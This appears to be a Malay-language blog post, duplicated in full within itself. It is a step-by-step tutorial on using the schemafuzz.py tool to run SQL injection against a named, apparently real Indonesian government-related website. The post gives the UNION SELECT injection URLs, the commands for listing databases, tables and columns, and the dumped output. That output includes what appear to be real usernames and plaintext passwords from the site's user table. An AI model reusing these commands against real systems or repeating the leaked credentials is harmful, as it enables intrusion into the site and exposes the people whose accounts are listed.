![[Most Recent Quotes from www.kitco.com]](http://www.kitconet.com/charts/metals/gold/t24_au_en_usoz_2.gif)
![[Most Recent Quotes from www.kitco.com]](http://www.kitconet.com/images/quotes_special.gif)
Perkara yg diperlukan :
1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3.command prompt (CMD)
-----------------------------------------------------------------
1.Cari web target
contohnya: http://www.ditplb.or.id/profile.php?id=1
2.Cari database
contohnya : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --dbs
rsauron:darkc0de.com MySQL Injection DataExt & Fuzzer v3.0
-----------------------------------------------------------------
[+] URL:http://www.ditplb.or.id/profile.php?id=1+AND+2+UNION+SELECT+0,1,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Starting current users database extraction...
[-] Done
3.Cari nama table dalam database
contohnya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --schema -D t15618_plb
rsauron:darkc0de.com MySQL Injection DataExt & Fuzzer v3.0
-----------------------------------------------------------------
[+] URL:http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Starting current users database extraction...
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] Done
terdapat 11 table..
4.Melihat data dari suatu table dan column
contohnya :schemafuzz.py -e www.ditplb.or.id/profile.php?id=-1+union+select+0,1,darkc0de -d t15618_plb -t user -c ID_user,UserID,Password,Keterangan,Admin
rsauron:darkc0de.com MySQL Injection DataExt & Fuzzer v3.0
-----------------------------------------------------------------
[+] URL:http://www.ditplb.or.id/profile.php?id=-1+union+select+0,1,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Extracting information from user table...
[0]['1', 'direktur', 'direkturplb', 'Direktur']
[1]['2', 'yusuf', 'siplb', 'Achmad']
[2]['3', 'abdulmukti', 'fatmawatimukti', 'P.']
[3]['4', 'harry', 'progkal', 'ProgKAL', 'Admin']
[4]['5', 'samino', 'kurikulum', 'Kurikulum', 'Admin']
[5]['6', 'mugiarsih', 'manajemen', 'Manajemen', 'Admin']
[6]['7', 'sutopo', 'kesiswaan', 'Kesiswaan', 'Admin']
[7]['8', 'winarno', 'sarana', 'Sarana', 'Admin']
[8]['9', 'sanusi', 'tatausaha', 'Tata']
[9]['10', 'sutji', 'evaluasi', 'Evaluasi', 'Admin']
[10]['11', 'thamrin', 'informatika', 'Informatika', 'Admin']
[11]['12', 'adjie', 'kerjasama', 'Kerjasama', 'Admin']
[12]['13', 'media', 'media', 'Media', 'Admin']
[-] Done
-------------------------------------------------------------------------------------
- Cara diatas digunakan untuk sql versi 5
- Untuk versi 4 gunakan perintah --fuzz untuk mencari nama table n column
contohnya :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --fuzz
penerangan perintah :
--fuzz <-- mencari nama column n table pada sql versi 4
--schema <-- melihat nama table
--dump <-- melihat data dalam column,table dan database
--dbs <-- melihat database
1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3.command prompt (CMD)
-----------------------------------------------------------------
1.Cari web target
contohnya: http://www.ditplb.or.id/profile.php?id=1
2.Cari database
contohnya : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --dbs
rsauron:darkc0de.com MySQL Injection DataExt & Fuzzer v3.0
-----------------------------------------------------------------
[+] URL:http://www.ditplb.or.id/profile.php?id=1+AND+2+UNION+SELECT+0,1,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Starting current users database extraction...
[-] Done
3.Cari nama table dalam database
contohnya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --schema -D t15618_plb
rsauron:darkc0de.com MySQL Injection DataExt & Fuzzer v3.0
-----------------------------------------------------------------
[+] URL:http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Starting current users database extraction...
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] Done
terdapat 11 table..
4.Melihat data dari suatu table dan column
contohnya :schemafuzz.py -e www.ditplb.or.id/profile.php?id=-1+union+select+0,1,darkc0de -d t15618_plb -t user -c ID_user,UserID,Password,Keterangan,Admin
rsauron:darkc0de.com MySQL Injection DataExt & Fuzzer v3.0
-----------------------------------------------------------------
[+] URL:http://www.ditplb.or.id/profile.php?id=-1+union+select+0,1,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Extracting information from user table...
[0]['1', 'direktur', 'direkturplb', 'Direktur']
[1]['2', 'yusuf', 'siplb', 'Achmad']
[2]['3', 'abdulmukti', 'fatmawatimukti', 'P.']
[3]['4', 'harry', 'progkal', 'ProgKAL', 'Admin']
[4]['5', 'samino', 'kurikulum', 'Kurikulum', 'Admin']
[5]['6', 'mugiarsih', 'manajemen', 'Manajemen', 'Admin']
[6]['7', 'sutopo', 'kesiswaan', 'Kesiswaan', 'Admin']
[7]['8', 'winarno', 'sarana', 'Sarana', 'Admin']
[8]['9', 'sanusi', 'tatausaha', 'Tata']
[9]['10', 'sutji', 'evaluasi', 'Evaluasi', 'Admin']
[10]['11', 'thamrin', 'informatika', 'Informatika', 'Admin']
[11]['12', 'adjie', 'kerjasama', 'Kerjasama', 'Admin']
[12]['13', 'media', 'media', 'Media', 'Admin']
[-] Done
-------------------------------------------------------------------------------------
- Cara diatas digunakan untuk sql versi 5
- Untuk versi 4 gunakan perintah --fuzz untuk mencari nama table n column
contohnya :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --fuzz
penerangan perintah :
--fuzz <-- mencari nama column n table pada sql versi 4
--schema <-- melihat nama table
--dump <-- melihat data dalam column,table dan database
--dbs <-- melihat database
0 comments:
Post a Comment